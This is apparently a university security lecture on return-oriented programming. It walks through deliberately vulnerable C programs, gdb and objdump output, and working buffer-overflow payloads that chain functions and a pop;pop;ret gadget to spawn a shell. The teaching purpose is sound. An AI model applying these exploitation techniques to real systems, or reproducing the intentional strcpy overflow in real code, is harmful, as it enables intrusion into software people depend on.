Lec. 23: Gadgets in Return Oriented Programs
Table of Contents
1 Return Oriented Programming: Function Chaining Gadgets
Return Oriented Programming or (ROP) is the process of using small sequences of code (or gadgets) that are embedded in other code. The "return" portion of the code comes from the fact that these small pieces of code, or gadgets, all end with a return statement. The concept is that while there may be protections in places to stop you from loading shell code, we can leverage the code already within our target program.
As an additional benefit for ROP, similar to the benefit from return-2-libc, is that there a ROP chain is functional even when the stack memory is labeled non-executable and there is memory address randomization. The reason is that we are only going to use already existing code to build an exploit, namely code that is in the .text segment, so it is already labeled executable. Moreover, the .text segment isn't randomized with ASLR, so it will always be consistently in the same place. This means this style of attack is really powerful and really consistent.
Below, we follow an example using of ROP where we use it to properly chain function calls together, but we will also look at an example where the ROP itself, without calling any other function, is capable of launching a shell. Also note, that ll the code we are working with in this lesson are compiled without executable stacks, so we can't easily load shell code 1.
1.1 Overwriting the return address with function calls
Let's start with a simple example of where ROPs become very useful. Consider the following code where we want bad() to get called
#include <stdio.h> #include <stdlib.h> #include <string.h> void bad(){ printf("You've been PWNED!\n"); } void vuln(char * s){ char buf[100]; strcpy(buf,s); printf("Buf: %s\n", buf); } void main(int argc, char * argv[]){ vuln(argv[1]); }
We know how to solve this one: we overflow the buffer and we overwrite the return the address for vuln() with bad(). To do this, first we can look at the disassembled code to see where the buffer is declared into relation to the return address:
ser@si485H-base:demo$ objdump -d -M intel call_bad (...) 0804847d <bad>: 804847d: 55 push ebp 804847e: 89 e5 mov ebp,esp 8048480: 83 ec 18 sub esp,0x18 8048483: c7 04 24 70 85 04 08 mov DWORD PTR [esp],0x8048570 804848a: e8 c1 fe ff ff call 8048350 <puts@plt> 804848f: c9 leave 8048490: c3 (...) 08048491 <vuln>: 8048491: 55 push ebp 8048492: 89 e5 mov ebp,esp 8048494: 81 ec 88 00 00 00 sub esp,0x88 804849a: 8b 45 08 mov eax,DWORD PTR [ebp+0x8] 804849d: 89 44 24 04 mov DWORD PTR [esp+0x4],eax 80484a1: 8d 45 94 lea eax,[ebp-0x6c] 80484a4: 89 04 24 mov DWORD PTR [esp],eax 80484a7: e8 94 fe ff ff call 8048340 <strcpy@plt> 80484ac: 8d 45 94 lea eax,[ebp-0x6c] 80484af: 89 44 24 04 mov DWORD PTR [esp+0x4],eax 80484b3: c7 04 24 83 85 04 08 mov DWORD PTR [esp],0x8048583 80484ba: e8 71 fe ff ff call 8048330 <printf@plt> 80484bf: c9 leave 80484c0: c3 ret (...)
We see that the buffer is allocated at ebp-0x6c
so we can quickly do
the exploit like so where we jump to bad():
user@si485H-base:demo$ ./call_bad `python -c "print 'A'*(0x6c+4) + '\x7d\x84\x04\x08'"` Buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}? You've been PWNED! Segmentation fault (core dumped)
1.2 Functions with Arguments
We can make the exploit a little more intriguing if we were to make so that bad() will call system() with it's argument:
#include <stdio.h> #include <stdlib.h> #include <string.h> char pwn[]="/bin/sh"; void bad(char * s){ printf("You've been PWNED!\n"); system(s); } void vuln(char * s){ char buf[100]; strcpy(buf,s); printf("Buf: %s\n", buf); } void main(int argc, char * argv[]){ vuln(argv[1]); }
In this scenario, much like a return-2-libc attack, if we have the
stack properly aligned with the right argument, namely pwn
, then
we'll get a shell to launch. For that to happen, we'll need the
exploit on the stack to look like this:
| <addr pwn> | | bad's ret address | | <addr bad> |
That is, the address of bad overwrites the return address of vuln. The next item in the stack will be bad's return address, which we don't need to worry about; however, the following item is the first argument to bad, which should be pwn.
To complete this exploit, we determine the address of pwn and bad, and give it a go.
user@si485H-base:demo$ gdb -q call_bad_sh Reading symbols from call_bad_sh...done. (gdb) x/x pwn 0x804a02c <pwn>: 0x6e69622f (gdb) x/x bad 0x80484ad <bad>: 0x83e58955 (gdb) quit user@si485H-base:demo$ ./call_bad_sh `python -c "print 'A'*(0x6c+4) + '\xad\x84\x04\x08' + '\xfe\xbe\xad\xde' + '\x2c\xa0\x04\x08'"` Buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?????,? You've been PWNED! $
That's not too bad.
1.3 Chaining Two Functions with Arguments
Let's add a bit more complexity to this exploit. Suppose now we want to make a call to another function first before calling bad(), and the arguments to those functions matter.
#include <stdio.h> #include <stdlib.h> #include <string.h> char pwn[100]; void bin_sh(int magicbeef){ if (magicbeef == 0xdeadbeef){ strcat(pwn,"/bin/sh"); } printf("pwn: %s\n",pwn); } void bad(char * s){ printf("You've been PWNED!\n"); system(s); } void vuln(char * s){ char buf[100]; strcpy(buf,s); printf("Buf: %s\n", buf); } void main(int argc, char * argv[]){ pwn[0]='\0'; vuln(argv[1]); }
This time we need to first call binsh() with magicbeef being deadbeef and then we need to call bad() afterwards to get our shell. This might seem like no problem, at first, but once we try it out, you'll see where the challenge arises.
Starting with the easy part, we can look at what the stack should be to properly call binsh:
| 0xdeadbeef | | bin_sh's ret address | | <addr bin_sh> |
We overwrite the return address of vuln() with the address of binsh() where it's arguments is 0xdeadbeef. Before, in the last example, we didn't consider the return address of the function we jumped to, but this time we have to. What is the next function we call? bad(). So what we really need for the stack is to look like this.
| <addr pwn> | | 0xdeadbeef | | <addr bad> | | <addr bin_sh> |
If you follow the stack, the argument to binsh() is 0xdeadbeef and
its return address is bad(). The argument to bad() is pwn
, and the
return address for bad is 0xdeadbeef, which doesn't matter because at
this point we have the shell.
Let's give it a try:
user@si485H-base:demo$ gdb -q call_bad_chain Reading symbols from call_bad_chain...done. (gdb) x/x pwn 0x804a060 <pwn>: 0x00000000 (gdb) x/x bad 0x8048505 <bad>: 0x83e58955 (gdb) x/x bin_sh 0x80484ad <bin_sh>: 0x57e58955 (gdb) quit user@si485H-base:demo$ ./call_bad_chain `python -c "print 'A'*(0x6c+4) + '\xad\x84\x04\x08' +'\x05\x85\x04\x08' +'\xef\xbe\xad\xde' + '\x60\xa0\x04\x08'"` Buf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?ᆳ?`? pwn: /bin/sh You've been PWNED! $
It's a shell! Great.
1.4 Chaining Three or More Functions with Arguments
It's about to fall apart. Consider what happens when we need to call another function in this chain. Where could it go? Right now we have this.
| <addr pwn> | | 0xdeadbeef | <-- bad's return addres is bin_sh's argument | <addr bad> | | <addr bin_sh> |
The slot for bad's return address is already being used for the argument to binsh. We're hosed. Worse, consider what would happen in this code example where one of the functions needs to take two arguments:
#include <stdio.h> #include <stdlib.h> #include <string.h> char pwn[100]; void add_bin(int magiccafe, int magicfood){ if (magiccafe == 0xcafebabe && magicfood == 0x0badf00d){ strcat(pwn,"/bin"); } printf("add_bin: pwn: %s\n", pwn); } void add_sh(int magicbeef){ if (magicbeef == 0xdeadbeef){ strcat(pwn,"/sh"); } printf("add_sh: pwn: %s\n", pwn); } void bad(char * s){ printf("You've been PWNED!\n"); system(s); } void vuln(char * s){ char buf[100]; strcpy(buf,s); printf("Buf: %s\n", buf); } void main(int argc, char * argv[]){ pwn[0]='\0'; vuln(argv[1]); }
Now, the construction of the bin/sh string is in two parts, and one of the functions requires /two arguments. Looks like our luck ran out and this is impossible, but just in case, let's try looking at the stack anyway.
Starting with the first function addbin and it's two arguments which
should be followed by add_sh
, we'd need something like this:
| 0x0badf00d | | 0xcafebade | | <addr add_sh> | | <addr add_bin> |
That's possible, but then what happens: we've reached an impasse. addsh() takes one argument and the way the stack is alligned, that argument is 0x0badf00d. That's just not what we need — we need 0xdeadbeef.
It would seem like this is impossible, but think about what we could do if we were able to clear the stack. Suppose we had a gadget or little function that only did pop;pop;ret then we could jump there instead of addsh() and clear out the stack before the next return. Something like the following:
| <addr pwn> | | 0xdeadbeef | | <addr bad> | | <addr add_sh> | | 0x0badf00d | | 0xcafebabe | | <addr pop;pop;ret> | | <addr add_bin> |
If you follow the function chain, after adbin() is called with arguments 0xcafebade and 0x0badf00d, the next function to run is a gadget that pops 0xcafebabe and 0x0badf00d off the stack. When the gadget returns, the next address on the stack is addsh() with the argument 0xdeadbeef. The return address of addsh() is bad(), and thus the exploit completes.
2 ROP Gadgets
We've been doing a bit of return oriented programming already, but now
we really get into it. The big idea was to chain a bunch of functions
together through their return address to complete a task. That is a
form of return oriented programming, but now we need something
different. We need a very specific kind of an expression, a
pop;popl;ret
which is not a typical function that we can write. How
do we find such a thing?
The answer lies in the code itself. While we as programmers of C will
never explicitly write a function that is just pop;pop;ret
, the C
compiler will most certainly compile instructions that contain that
sequence of instructions. We describe that sequence as a gadget
because it unintentionally gives us the functionality we need, and it
ends in a return statement so it can be chained with other function
calls.
2.1 Hunting a Gadget
The key now is to hunt down the gadget we need. For that, we can use objdump and grep. For reference the -A option with grep prints the specified number of lines after a match, and the -B option with grep prints the specified number of lines before a match.
user@si485H-base:demo$ objdump -d -M intel call_bad_doublechain | grep -B 3 ret | grep -A 3 pop 8048335: 5b pop ebx 8048336: c3 ret -- -- 8048508: 5f pop edi 8048509: 5d pop ebp 804850a: c3 ret -- 8048556: 83 c4 14 add esp,0x14 8048559: 5f pop edi 804855a: 5d pop ebp 804855b: c3 ret -- 8048571: 89 04 24 mov DWORD PTR [esp],eax -- 804862d: 5e pop esi 804862e: 5f pop edi 804862f: 5d pop ebp 8048630: c3 ret -- 804863f: 90 nop -- 8048656: 5b pop ebx 8048657: c3 ret
The search terms above looked for any return statement, printing the 3
previous lines. Then the following grep searched for a pop statement,
printing the 3 lines after. The result, above, shows us where there is
instance of a pop;pop;ret;
, at address 0x08048508. What is also
important with this gadget is that we don't care to where the data is
being popped, to any of the registers is fine, as long as it is being
popped off the stack.
2.2 Using the gadget
With this information in place, we can complete the exploit by first identifying the other important address and lining up our stack like below:
| <addr pwn> | | 0xdeadbeef | | <addr bad> | | <addr add_sh> | | 0x0badf00d | | 0xcafebabe | | <addr pop;pop;ret> | | <addr add_bin> |
We can use gdb to find the other addresses:
user@si485H-base:demo$ gdb -q call_bad_doublechain Reading symbols from call_bad_doublechain...done. (gdb) x/x add_bin 0x80484ad <add_bin>: 0x57e58955 (gdb) x/x add_sh 0x804850b <add_sh>: 0x57e58955 (gdb) x/x bad 0x804855c <bad>: 0x83e58955 (gdb) x/x pwn 0x804a060 <pwn>: 0x00000000 (gdb) quit user@si485H-base:demo$ ./call_bad_doublechain `python -c "s='A'*(0x6c+4); s+='\xad\x84\x04\x08'; s+='\x08\x85\x04\x08'; s+='\xbe\xba\xfe\xca'; s+='\x0d\xf0\xad\x0b'; s+='\x0b\x85\x04\x08'; s+='\x5c\x85\x04\x08'; s+='\xef\xbe\xad\xde'; s+='\x60\xa0\x04\x08'; print s; "` ?uf: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA???? \ᆳ?`? add_bin: pwn: /bin add_sh: pwn: /bin/sh You've been PWNED! $
2.3 Where do we go from here?
In this example, we used a gadget within the code that did a simple task of chaining functions with different numbers of arguments. What if we were to do something more interesting? What if we were able to find enough gadgets to build a complete exploit? That idea is called ROP exploits, and believe it or not, you can do a complete exploit with shell code using only small gadgets. And, yes, it is as awesome as it sounds!
Footnotes:
Much of the ROP examples are adapted from CodeArcanna article by Alex Reese, Tue 28 May 2013.